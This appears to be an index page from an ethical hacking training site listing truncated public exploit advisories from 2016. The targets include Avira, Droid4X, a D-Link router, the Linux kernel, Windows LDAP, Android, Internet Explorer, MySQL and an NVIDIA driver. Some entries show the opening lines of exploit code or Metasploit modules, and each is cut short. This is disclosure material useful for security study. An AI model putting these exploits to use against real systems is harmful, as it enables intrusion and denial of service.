Exploits

Avira Antivirus 15.0.21.86 – ‘.zip’ Directory Traversal / Command Execution Exploit

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credit: R-73eN

# Title : Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)

# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 – Reported to Vendor through Bugcrowd.
# 2016-06-29 – Vendor Replied.
# 2016-07-05 – Vendor Replicated the vulnerability.
# 2016-09-02 – Vendor released updated […]

By |November 13th, 2016|Exploits|

Droid4X Privilege Escalation Vulnerability

Credits: CT-Zer0 Team
# Exploit Title: Droid4X Unquoted Service Path Privilege Escalation

# Category: local
# Vendor Homepage: http://www.droid4x.com/
# Software Link: http://dl.haima.me/download/DXDown/win/Z001/Droid4XInstaller.exe
# Tested on: Windows 7 x86/x64

1. Description

Droid4XService (Droid4XService.exe) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged […]

By |November 13th, 2016|Exploits|

DLink ADSL Router DSL-2750E SEA_1.07 Remote File Disclosure Vulnerability

Credits: Todor Donev
#!/bin/sh
#
#  D-Link ADSL ROUTER DSL-2750E SEA_1.07
#  Remote File Disclosure
#
#  Modem Name:               DSL-2750E
#  Firmware Version:         SEA_1.07

#
#  Disclaimer:
#  This and previous programs are for educational
#  purposes ONLY. Do not use them without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor […]

By |November 13th, 2016|Exploits|

Linux Kernel – TCP Related Read Use-After-Free Exploit

Credits: Marco Grassi

#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>
 
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif
 
long r;
 
 
int main(int argc, char **argv)
{
    while (1) {
        pid_t pid = fork();
 
        if […]

By |November 13th, 2016|Exploits|

Microsoft Windows Server 2008 / 2012 – LDAP RootDSE Netlogon Denial Of Service (PoC)

Credit: Todor Donev
#!/usr/bin/perl
#
#  MS Windows Server 2008/2008 R2/2012/2012 R2/AD LDAP RootDSE Netlogon
#  (CLDAP "AD Ping") query reflection DoS PoC
#

#
#  MS Windows Server 2016
#
#  Description:
#  The attacker sends a simple query to a vulnerable reflector
#  supporting the Connectionless LDAP […]

By |November 13th, 2016|Exploits|

Android Proxy Auto Config (PAC) Crash Vulnerability

Credits: Yakov Shafranovich
Summary

Android devices can be crashed forcing a halt and then a soft reboot
by downloading a large proxy auto config (PAC) file when adjusting the
Android networking settings. This can also be exploited by an MITM
attacker that can intercept and replace the PAC file. However, the […]

By |November 13th, 2016|Exploits|

Microsoft Internet Explorer WININET.dll

Credits: SkyLined
Synopsis
 
A specially crafted HTTP response can cause the CHttpHeaderParser::ParseStatusLine method in WININET to read data beyond the end of a buffer. The size of the read can be controlled through the HTTP response. An attacker that is able to get any application that uses WININET […]

By |November 13th, 2016|Exploits|

Linux Kernel (Ubuntu / Fedora / Redhat) – ‘Overlayfs’ Privilege Escalation Exploit – Metasploit Code

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require "msf/core"
 
class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking
 
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
        'Name'           => 'Overlayfs Privilege Escalation',
        ‘Description’    => %q{
          This module attempts to exploit two different CVEs related to overlayfs.
          CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
                                            3.16.0-25 […]

By |November 3rd, 2016|Exploits|

MySQL / MariaDB / PerconaDB – ‘root’ Privilege Escalation Vulnerability – Metasploit Code

Credits: Dawid
I. VULNERABILITY
————————-
 
MariaDB / MySQL / PerconaDB   –   Root Privilege Escalation
 
MySQL
    <= 5.5.51
    <= 5.6.32
    <= 5.7.14
 
MariaDB
    All current
 
Percona Server
    < 5.5.51-38.2
    < 5.6.32-78-1
    < 5.7.14-8
 
Percona XtraDB Cluster
    < 5.6.32-25.17
    < 5.7.14-26.17
    < 5.5.41-37.0
 
 
II. BACKGROUND
————————-
 
MySQL:
 
“MySQL is the world’s most popular open source database.
Whether you are a fast growing web property, technology ISV or large
enterprise, MySQL […]

By |November 3rd, 2016|Exploits|

NVIDIA Driver – NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Priv

The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
 
In this particular routine,
 
if ( cur->image_names_count > 0 ) {
  // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
  image_filename = info_->ImageFileName;
  buf = image_filename->Buffer;
  if ( buf )
  {
    if ( !v5 )
    {
      i = 0i64;
      num_chars = image_filename->Length […]

By |November 3rd, 2016|Exploits|